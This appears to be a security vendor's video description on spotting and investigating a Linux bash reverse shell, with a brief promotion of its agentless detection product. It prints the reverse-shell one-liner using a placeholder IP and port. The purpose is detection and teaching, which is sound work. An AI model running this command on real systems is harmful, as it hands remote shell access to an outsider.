In this video, we cover how to investigate one of our favorite reverse shells on Linux:

bash -i >& /dev/tcp/<IP_ADDRESS>/<PORT> 0>&1

This simple command will launch a shell from the victim system to the IP address supplied. It is simple, effective, and works immediately on just about any Linux distribution.

In this video we'll show you how to identify this attack using command line tools and agentless Sandfly. We'll cover the basic reverse shell attack pattern, what it looks like from an alert perspective, what it looks like from the terminal, and how to investigate the suspicious process using simple command line tools. We'll even show you how to spy on the reverse shell activity using a command built into many Linux distributions (peekfd).

Sandfly is able to find this and many other types of Linux attacks without deploying any endpoint agents. Get your free license today or contact us for more information.